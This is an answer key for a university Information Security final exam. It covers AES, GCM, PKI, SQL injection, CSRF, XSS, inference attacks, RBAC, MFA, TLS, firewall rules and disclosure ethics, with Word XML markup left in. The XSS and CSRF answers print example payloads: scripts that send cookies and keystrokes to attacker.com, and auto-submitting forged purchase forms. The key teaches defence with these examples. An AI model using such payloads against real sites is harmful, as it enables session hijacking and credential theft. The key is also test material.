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National University of Computer and Emerging Sciences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FAST School of Computing Fall-2025 Lahore Campus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KEY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Information Security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CS3002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Exam Type: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Final Exam (Solution)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75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CLO-1: Question 1 [10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 (1 mark each)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1.1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S-box for byte substitution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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AES SubBytes uses a substitution box (S-box) for non-linear byte substitution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1.2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GCM (Galois/Counter Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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GCM provides both confidentiality through encryption and authenticity through GMAC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1.3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d) Bob's public key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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For confidentiality, encrypt with recipient's public key; only Bob's private key can decrypt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1.4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Integrity and authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A0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MAC verifies message integrity and authenticates sender, but does NOT provide confidentiality or non-repudiation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1.5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Authentication Server (AS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A0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AS is part of Kerberos, not PKI. PKI components include CA, RA, and CRL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1.6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Database query construction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A0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SQL injection exploits improper input validation in SQL query construction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1.7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HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A0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HttpOnly attribute prevents JavaScript/client-side scripts from accessing cookies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1.8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Publicly accessible servers like web servers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A0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DMZ contains public-facing servers, isolating them from internal sensitive resources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1.9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Combining asymmetric encryption for key exchange and symmetric encryption for data transfer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A0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TLS uses asymmetric crypto to exchange session keys, then symmetric crypto for efficient data encryption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1.10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Something you are</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A0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 Biometric authentication is based on inherent physical characteristics (something you are)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CLO-3: Question 2 [8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A [4 Marks] (2 marks each)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SQL Injection Countermeasure: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Use Prepared Statements (Parameterized Queries):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Separate SQL code from user data by using placeholders for parameters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The database engine treats user input as data only, not executable code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Example: PreparedStatement stmt = conn.prepareStatement(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"SELECT * FROM users WHERE username = ? AND password = ?");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stmt.setString(1, username); stmt.setString(2, password);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Alternative acceptable answers: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stored procedures with parameterized inputs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Implement input validation using whitelisting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ORM (Object-Relational Mapping) frameworks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Cross-Site Scripting (XSS) Countermeasure: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Input Sanitization and Output Encoding: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Encode all user-supplied data before rendering in HTML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Convert special characters: &lt; becomes &amp;lt;, &gt; becomes &amp;gt;, etc.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context-appropriate encoding (HTML, JavaScript, URL encoding)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Implement Content Security Policy (CSP) headers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Alternative acceptable answers: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Input validation using whitelisting approach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HTTPOnly and Secure flags on cookies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Implement proper HTML escaping functions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 [4 Marks] (1 mark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449"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidTr="000A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Cookie Attribute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Benefit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HttpOnly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JavaScript from accessing the cookie, protecting against XSS-based cookie theft / session hijacking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Ensures cookie is only transmitted over HTTPS connections, preventing interception over unencrypted HTTP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SameSite=Strict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the cookie from being sent in cross-site requests, mitigating CSRF attacks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restriction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Limits cookie scope to specific domain/subdomain, preventing unauthorized access from other domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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CLO-1: Question 3 [10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A: Block Cipher Modes [6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Mode Recommendation [3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Recommended Mode: CBC (Cipher Block Chaining)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Justification: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Reason 1 (Pattern Hiding): CBC mode provides better security than ECB because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identical plaintext blocks produce different ciphertext blocks due to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chaining mechanism. Each block is XORed with the previous ciphertext block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before encryption. This is crucial for medical records that may contain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repetitive data patterns.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Reason 2 (Semantic Security): CBC provides semantic security where the same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plaintext encrypted twice produces different ciphertexts (with different IVs).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ECB always produces identical ciphertext for identical plaintext, making it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vulnerable to pattern analysis attacks.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Reason 3 (Industry Standard): CBC is widely accepted for encrypting large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files and is compliant with healthcare security standards like HIPAA.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Additional acceptable reasons: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CBC requires an IV (Initialization Vector), adding randomness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ECB reveals data patterns which could leak sensitive medical information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ECB Vulnerability [3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Significant Security Vulnerability of ECB Mode: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ECB (Electronic Codebook) mode encrypts each block independently using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same key. This means identical plaintext blocks always produce identical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ciphertext blocks, revealing patterns in the data.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Impact on Large Files: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In large medical records (256 KB), there are likely many repeated values or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patterns (e.g., normal blood pressure readings, standard test results,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repeated field names). With ECB, these patterns remain visible in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ciphertext, allowing attackers to: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Identify repeated information without decryption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Perform frequency analysis attacks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Potentially identify specific medical conditions based on patterns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Reconstruct approximate content through pattern matching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Famous Example: ECB-encrypted images show visible outlines of original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content (ECB penguin problem), demonstrating information leakage.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B: Public Key Cryptography [4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Confidentiality and Authentication Process [4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Complete Process for Confidentiality AND Authentication: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Step 1 - Authentication (Digital Signature):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Alice creates a hash of her message using a cryptographic hash function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(e.g., SHA-256). She then encrypts this hash with her PRIVATE key to create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 digital signature.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>Step 2 - Confidentiality (Encryption):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Alice encrypts the original message using Bob's PUBLIC key. She also includes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her digital signature (from Step 1) with the encrypted message.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Step 3 - Transmission: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Alice sends: Encrypted_Message = E_Bob's_Public(Message) +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                             E_Alice's_Private(Hash(Message))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Step 4 - Verification (Bob's Side):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Bob receives the encrypted package and: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a) Decrypts the message using his PRIVATE key to get the original message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b) Decrypts the signature using Alice's PUBLIC key to get the hash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c) Computes hash of the decrypted message independently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d) Compares the two hashes - if they match, authentication is confirmed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Summary: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Confidentiality: Achieved by encrypting with Bob's PUBLIC key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Authentication: Achieved by signing with Alice's PRIVATE key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Only Bob can read (has private key to decrypt)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Bob knows it's from Alice (only Alice's public key verifies her signature)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CLO-4: Question 4 [12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A: CSRF Attack Analysis [6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CSRF Attack Scenario [4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Realistic CSRF Attack Scenario against ShopSecure.com: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Attack Vector (Delivery Method):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attacker creates a malicious website (e.g., fakeoffers.com) or sends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an email with embedded HTML. When the user visits this malicious site while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logged into ShopSecure.com, the page contains hidden forms or JavaScript that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automatically submits requests to ShopSecure.com.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Example malicious HTML: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&lt;img src="https://shopsecure.com/purchase?item=laptop&amp;quantity=1&amp;use_saved_payment=true" /&gt;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or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&lt;form action="https://shopsecure.com/purchase" method="POST" id="csrf"&gt;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&lt;input type="hidden" name="item" value="expensive_jewelry" /&gt;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&lt;input type="hidden" name="quantity" value="5" /&gt;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&lt;script&gt;document.getElementById('csrf').submit();&lt;/script&gt;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>Malicious Action Executed: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When the victim visits the attacker's site, the hidden form automatically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submits a purchase request to ShopSecure.com using the victim's stored payment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information, buying products and shipping them to an address controlled by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the attacker.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Why the Attack Succeeds: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1. The victim is currently authenticated (logged in) to ShopSecure.com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2. The browser automatically includes the victim's session cookies with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forged request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3. ShopSecure.com cannot distinguish between legitimate user-initiated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requests and forged requests from the malicious site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4. The web application trusts all requests that come with valid session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cookies, without verifying the request's origin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CSRF Countermeasures [2 marks] (1 mark each)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Countermeasure 1: Anti-CSRF Tokens (Synchronizer Token Pattern)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Generate a unique, unpredictable token for each user session and embed it in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all forms. The server validates this token with each request. Since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attacker cannot access this token (due to Same-Origin Policy), forged requests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will fail validation.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Implementation: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&lt;form&gt;&lt;input type="hidden" name="csrf_token" value="random_token_123" /&gt;&lt;/form&gt;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Countermeasure 2: SameSite Cookie Attribute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Set SameSite=Strict or SameSite=Lax on session cookies to prevent browsers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from sending cookies in cross-site requests. This prevents the attacker's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site from including the victim's authentication cookies.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Implementation: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Set-Cookie: sessionid=abc123; SameSite=Strict; Secure; HttpOnly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Alternative acceptable answers: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Check Referer/Origin headers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Require re-authentication for sensitive operations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custom headers for AJAX requests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Implement double-submit cookie pattern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B: XSS Attack Analysis [6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Stored XSS Exploitation [2+2+2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Exploitation Method: [2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attacker submits a product review containing malicious JavaScript code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instead of legitimate review text. For example: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Review: "Great product! &lt;script&gt;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fetch('https://attacker.com/steal?cookie='+document.cookie)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&lt;/script&gt;"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Since the application doesn't properly sanitize input, this malicious script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is stored in the database. When other users view the product page, the server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retrieves and renders this review without proper output encoding. The victim's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browser executes the malicious script, believing it's legitimate code from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ShopSecure.com.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Malicious Actions: [2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1. Session Hijacking/Cookie Theft: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The malicious script can steal the victim's session cookies and send them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to the attacker's server using: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document.location='http://attacker.com/steal?cookie='+document.cookie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The attacker can then use these cookies to impersonate the victim and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access their account.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2. Keylogging/Credential Theft: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The script can inject a fake login form or capture keystrokes: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document.addEventListener('keypress', function(e) {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fetch('http://attacker.com/log?key='+e.key);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});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This captures sensitive information like passwords or credit card details.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Other acceptable examples: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Phishing by injecting fake content/forms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Defacing the website for that user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Redirecting users to malicious websites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Performing unauthorized actions on behalf of the user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Defense Mechanism: [2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Input Sanitization and Output Encoding (Content Escaping):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primary defense is to encode all user-supplied data before rendering it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 HTML. Convert special characters to their HTML entity equivalents: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&lt; becomes &amp;lt;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&gt; becomes &amp;gt;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" becomes &amp;quot;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' becomes &amp;#x27;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&amp; becomes &amp;amp;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Implementation example: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Instead of: &lt;%= user_review %&gt;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Use: &lt;%= htmlEscape(user_review) %&gt;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Additionally, implement Content Security Policy (CSP) headers to restrict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script execution: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>Content-Security-Policy: script-src 'self'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This prevents inline scripts from executing even if encoding is bypassed.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Alternative acceptable answers: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Input validation using whitelisting (only allow safe characters)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secure templating engines with auto-escaping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HTTPOnly cookies to limit damage from XSS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7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CLO-3: Question 5 [10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A: Database Inference Attack [5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Inference Attack Explanation [3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How Inference Attack Works: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The query returns aggregate data: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Result: CS department has 2 students with scholarships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   EE department has 0 students with scholarships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   BBA department has 0 students with scholarships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Inference Process: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1. Attacker knows there are only 2 CS students from publicly available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information (course rosters, department websites, etc.)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2. From the query result, attacker learns that 2 CS students have scholarships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3. By combining these two pieces of information, the attacker can infer that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BOTH CS students (Ahmed Ali and Bilal Shah) must have scholarships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4. Similarly, knowing Sara Khan is the only EE student and the count is 0,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attacker knows Sara does NOT have a scholarship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5. If the attacker can execute similar queries repeatedly with different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conditions (e.g., GPA ranges, departments), they can use tracker attacks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to deduce individual records even from aggregate data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Privacy Violation: Individual scholarship status (sensitive information) is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revealed without directly querying individual records, bypassing access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controls.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Prevention Techniques [2 marks] (1 mark each)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1. Query Result Suppression / Minimum Result Size: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Only return results if the count exceeds a minimum threshold (e.g., 5).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If count is below threshold, suppress the result or return "fewer than 5".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This prevents inference when group sizes are too small.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Implementation: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HAVING COUNT(*) &gt;= 5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2. Noise Addition / Data Perturbation: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Add random noise to aggregate results to make exact inference difficult.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For example, add ±1 or ±2 to count values randomly.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Example: Actual count is 2, but system returns 3 or 1 randomly.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This maintains statistical utility while preventing precise inference.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Other acceptable answers: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Implement query auditing and tracking to detect inference attempts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data cell suppression for sensitive cells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- Apply k-anonymity principles to ensure each record is indistinguishable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from at least k-1 other records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Restrict combinations of queries from the same user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Use differential privacy techniques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8 of 8 -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B: Database Encryption [5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Encryption Approach Comparison [3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323"/>
        <w:gridCol w:w="3455"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidTr="000A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 Approach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 entire database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• Strongest security - everything protected&lt;br&gt;• Simple key management (single key)&lt;br&gt;• Protects all data including metadata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• Highest performance overhead&lt;br&gt;• Cannot perform queries on encrypted data&lt;br&gt;• All-or-nothing access (cannot grant partial access)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 individual fields (GPA only)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• Minimal performance impact&lt;br&gt;• Surgical protection of sensitive data&lt;br&gt;• Other fields remain searchable/queryable&lt;br&gt;• Granular access control possible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• More complex key management&lt;br&gt;• Requires careful identification of sensitive fields&lt;br&gt;• Some fields may be accidentally left unencrypted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 at record level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• Balance between security and performance&lt;br&gt;• Each record can have different key&lt;br&gt;• Better access control than full DB encryption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• Moderate performance overhead&lt;br&gt;• Cannot query on encrypted fields&lt;br&gt;• More complex than field-level encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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 Recommendation [2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Recommended Approach: Encrypt individual fields (GPA only)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Justification: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1. Targeted Protection: GPA is the primary sensitive field that needs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protection. Other fields like StudentID, Name, Department need to remain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searchable and joinable with other tables for legitimate operations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(enrollment, course management, etc.)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2. Performance Consideration: The university needs to frequently query and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join these tables for administrative purposes. Full database or record-level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encryption would severely impact query performance. Field-level encryption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of only GPA allows all other operations to proceed normally.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3. Practical Usability: Administrators need to search students by name,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department, or ID regularly. Encrypting only GPA allows these searches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while protecting the most sensitive grade information. GPA can be decrypted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only when explicitly needed by authorized personnel.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4. Compliance: Meets security requirements (protecting sensitive academic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records) while maintaining operational efficiency.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Implementation note: Use deterministic encryption if GPA comparisons are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needed, or store encrypted GPA with a separate searchable hash for range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queries.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CLO-4: Question 6 [10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A: Access Control Models [6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Model Selection [4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Recommended Model: RBAC (Role-Based Access Control)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Justification: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Reason 1 - Natural Fit with Organizational Structure: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Healthcare organizations have well-defined roles (doctors, nurses, lab techs,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admin staff) with specific responsibilities. RBAC maps directly to these job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functions, making policy administration intuitive. Permissions are assigned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to roles, not individual users, which reflects how healthcare organizations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operate.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Reason 2 - Scalability and Ease of Management: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With potentially thousands of healthcare workers, RBAC is highly scalable.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When a new doctor is hired, simply assign them the "Doctor" role rather than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configuring individual permissions. When roles change (nurse promoted to head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nurse), simply reassign roles. This dramatically reduces administrative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overhead compared to DAC where each user's permissions must be individually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>managed.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Reason 3 - Principle of Least Privilege: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RBAC enforces least privilege by granting users only the permissions necessary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for their role. Lab technicians can only access lab-related data, not full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patient records or billing information. This compartmentalization reduces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insider threat risks and limits damage from compromised accounts.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Reason 4 - Compliance Requirements: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Healthcare regulations (HIPAA, GDPR for health data) require strict access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controls and audit trails. RBAC facilitates compliance by providing clear,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documented role definitions and making it easy to demonstrate who has access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to what data based on their job function.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Why NOT DAC: In DAC, individual users control access to their own resources.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This is unsuitable for healthcare where organizational policies, not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individual discretion, must govern access to patient data.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Why NOT MAC: MAC is too rigid for healthcare's dynamic environment. It's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designed for military/government with strict classification levels. Healthcare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requires more flexible access based on job function and patient assignment,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not just security clearance levels.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Access Control Matrix [2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907"/>
        <w:gridCol w:w="1834"/>
        <w:gridCol w:w="2408"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidTr="000A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 / Object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 Record (PR)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 Results (LR)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Billing Info (BI)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Khan (Doctor)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Read, Write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Read, Write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Read (maybe Write)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Nurse Sara (Nurse)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Read, Write (vital signs only)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No Access or Read only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Grading note: Award full marks for reasonable interpretations. Key points:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Doctors have full access to patient records and lab results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Nurses have limited write access (only vital signs, not full records)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Nurses typically don't access billing information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Any reasonable justification based on healthcare workflows is acceptable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B: Multi-Factor Authentication [4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c) MFA Scheme Design [2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Practical MFA Scheme for EHR System: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Factor 1 - Something You Know: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Username and strong password (minimum 12 characters, complexity requirements)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Factor 2 - Something You Have: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Smart card badge (already used for physical facility access) with embedded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certificate, or mobile authenticator app (e.g., Google Authenticator, Duo)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that generates time-based one-time passwords (TOTP)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Optional Factor 3 - Something You Are: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Fingerprint scan (biometric), especially for accessing highly sensitive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records or performing critical operations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Implementation Flow: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1. Healthcare worker enters username and password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2. System prompts for second factor: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Inserts smart card into reader OR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Enters 6-digit code from mobile authenticator app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3. For highly sensitive operations (e.g., accessing psychiatric records),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require fingerprint scan as additional factor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4. Grant access only after all required factors are successfully verified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Practical Consideration: Balance security with workflow efficiency - doctors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in emergency situations need quick access, so risk-based authentication can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reduce MFA requirements for low-risk access during emergencies.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d) MFA Superiority Explanation [2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Why MFA is More Secure Than Single-Factor (Even Strong Passwords):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1. Multiple Points of Failure Required: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Even if one factor is compromised, the attacker still needs the other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factor(s). If a password is stolen through phishing, keylogging, or data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breach, the attacker cannot access the account without the second factor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(physical token or biometric). This dramatically reduces risk from password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compromise.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2. Defense Against Different Attack Vectors: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Different factors protect against different threats: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Password (something you know) can be phished, brute-forced, or leaked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Physical token (something you have) cannot be remotely stolen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Biometric (something you are) cannot be shared or forgotten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 single strong password, no matter how complex, remains vulnerable to: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Phishing attacks (user tricked into entering password on fake site)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Keyloggers (malware captures keystrokes)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Credential stuffing (password reuse across sites)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Social engineering (tricked into revealing password)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Database breaches (even if hashed, can be cracked offline)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MFA eliminates most of these risks because the attacker must physically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possess the second factor or replicate biometric characteristics, which is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significantly harder than stealing a password.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Real-world Impact: Studies show MFA blocks 99.9% of automated attacks that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would succeed with password-only authentication.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CLO-4: Question 7 [8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A: TLS/SSL [4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a) TLS Handshake Phases [4 marks] (1 mark per phase)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Phase 1: Client Hello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client initiates the handshake by sending a "Client Hello" message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containing: supported TLS versions, list of supported cipher suites,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compression methods, and a random number (client random) for key generation.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The client also includes supported extensions.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Phase 2: Server Hello and Certificate Exchange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server responds with "Server Hello" selecting: the TLS version, cipher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suite, and compression method from the client's options. The server sends its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random number (server random). The server then sends its digital certificate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(containing public key) for authentication, and may request the client's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certificate for mutual authentication. Server sends "Server Hello Done."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Phase 3: Key Exchange and Pre-Master Secret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client verifies the server's certificate with a trusted CA. The client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generates a pre-master secret, encrypts it with the server's public key (from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certificate), and sends it to the server. Both client and server independently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compute the master secret and session keys from the pre-master secret and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two random numbers. The client sends "Change Cipher Spec" indicating future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messages will be encrypted.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Phase 4: Handshake Completion and Secure Communication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Both parties exchange "Finished" messages encrypted with the newly established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session keys to verify that key exchange was successful. If both can decrypt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each other's "Finished" messages, the handshake is complete. Secure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communication begins using symmetric encryption with the session keys for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all subsequent data transfer.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B: Firewall Configuration [4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Complete Firewall Rules [4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020"/>
        <w:gridCol w:w="2019"/>
        <w:gridCol w:w="2019"/>
        <w:gridCol w:w="927"/>
        <w:gridCol w:w="740"/>
        <w:gridCol w:w="769"/>
        <w:gridCol w:w="1262"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidTr="000A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 Address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 Address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 Port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 Port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(10.0.0.0/8 or company subnet)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(10.0.0.0/8 or company subnet)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Deny/Block</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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 of Rules:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Rules 1-2: Allow outbound HTTP requests and inbound responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Rules 3-4: Allow outbound HTTPS requests and inbound responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Rules 5-6: Allow SSH to specific internal server (192.168.1.10) from external</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Rule 7: Default deny rule - blocks all other traffic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acceptable format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(combining bidirectional HTTP/HTTPS):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20"/>
        <w:gridCol w:w="1320"/>
        <w:gridCol w:w="1414"/>
        <w:gridCol w:w="927"/>
        <w:gridCol w:w="920"/>
        <w:gridCol w:w="1027"/>
        <w:gridCol w:w="782"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidTr="000A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 Address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 Address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 Port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 Port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Permit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Deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Grading: Award marks for correct understanding of stateful firewall rules, proper port numbers, and default deny policy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CLO-2, CLO-5: Question 8 [7 Marks] - SOLUTIONS</w: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A: PECA Offenses [4 Marks] (1 mark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537"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidTr="000A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PECA Offense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 hacker gains unauthorized access to a government ministry's database and modifies official records.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Unauthorized modification to critical infrastructure systems</w:t>
            </w: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Unauthorized access to critical infrastructure systems if government database is considered critical)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Someone creates a fake social media profile impersonating a public figure and posts defamatory content.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Electronic forgery</w:t>
            </w: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Cyber impersonation)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t>An individual repeatedly sends threatening messages to someone via email and social media.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Cyber stalking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidTr="000A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 person distributes ransomware through email attachments that encrypt victims' files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Distributing and transmitting malicious code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Grading note: Accept reasonable variations as PECA offenses can overlap. Key is matching appropriate categories.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Part B: Professional Ethics [3 Marks]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b) Ethical Considerations for Zero-Day Vulnerability [3 marks]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Ethical Considerations and Conflicting Principles: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Conflicting Principle 1 - Public Safety vs. Responsible Disclosure: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On one hand, the researcher has a moral obligation to protect the public.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Millions of banking customers could be at risk if the vulnerability is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exploited. Immediate public disclosure could pressure the vendor to fix it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quickly. However, immediate public disclosure also gives malicious actors a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blueprint to exploit the vulnerability before a patch is available, potentially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causing widespread harm.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Conflicting Principle 2 - Transparency vs. Security Through Obscurity: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security community values transparency and believes that vulnerabilities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should be disclosed so the community can defend against them. However,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disclosing too early without giving the vendor time to patch creates a window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of vulnerability where users are defenseless against attacks.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Appropriate Actions to Balance These Principles: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1. Responsible Disclosure (Best Practice):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Contact the banking application vendor privately and confidentially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Provide detailed technical information about the vulnerability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Give the vendor a reasonable timeframe to develop and deploy a patch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(typically 90 days, industry standard)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Do NOT publicly disclose until patch is available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2. Coordinate with CERT/Security Response Team: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Report to a Computer Emergency Response Team (e.g., CERT/CC)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They can facilitate communication and mediate between researcher and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vendor if needed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3. Document Everything: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Keep detailed records of discovery, disclosure timeline, and all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communications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This protects the researcher legally and ensures accountability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4. After Patch Deployment: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Once the vendor releases a patch and users have reasonable time to update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(30-60 days), publish a technical report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This helps the security community learn and improves collective knowledge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Include mitigation strategies and indicators of compromise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5. Consider Legal Protections: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Ensure disclosure complies with local laws (some jurisdictions protect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  security researchers under "good faith" provisions)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 - Consider vulnerability disclosure programs if vendor has one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Ethical Balance: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The researcher should prioritize user safety by enabling a fix before public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disclosure, while also holding vendors accountable through coordinated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disclosure. This balances the immediate security needs of users with the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long-term benefit of transparency and improved security practices.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What NOT to Do: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Do not sell the vulnerability to criminals or exploit it personally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>- Do not disclose publicly without giving vendor reasonable time to patch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- Do not withhold information indefinitely if vendor is unresponsive (after </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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0ED6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  90 days, coordinated public disclosure may be necessary)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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alternative acceptable answer: Discuss conflict between professional duty to employer/client vs. duty to society, need for legal protection for ethical hackers, balancing financial interests with ethical responsibilities.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ED6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>END OF SOLUTION KEY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0ED6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Marking Scheme Summary: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10 marks (1 mark per MCQ)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8 marks (2+2+1+1+1+1)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10 marks (3+3+4)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12 marks (4+2+2+2+2)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10 marks (3+2+3+2)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10 marks (4+2+2+2)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8 marks (4+4)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br/>
      </w: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8:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A0ED6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 marks (4+3)</w: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Total: 75 marks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>General Marking Guidelines:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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lastRenderedPageBreak/>
        <w:t>Award partial credit for partially correct answers showing understanding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Accept alternative correct technical explanations not in this key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Deduct marks for incomplete justifications or missing key points</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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Reward clear, well-structured answers even if wording differs from solution key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0ED6" w:rsidRPr="000A0ED6" w:rsidRDefault="000A0ED6" w:rsidP="000A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ED6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Technical accuracy is prioritized over verbatim matching of solution text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B6242" w:rsidRDefault="000B6242">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="000B6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EF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8B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252"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66F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3B4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0F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0AFB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F17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57F70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60E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A7F00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9C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92951"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60E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F2746"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D56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B6CCF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="366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A7C87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="142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03D45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3A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12763"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93A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D3990"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EEB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2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="2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ED6"/>
    <w:rsid w:val="000A0ED6"/>
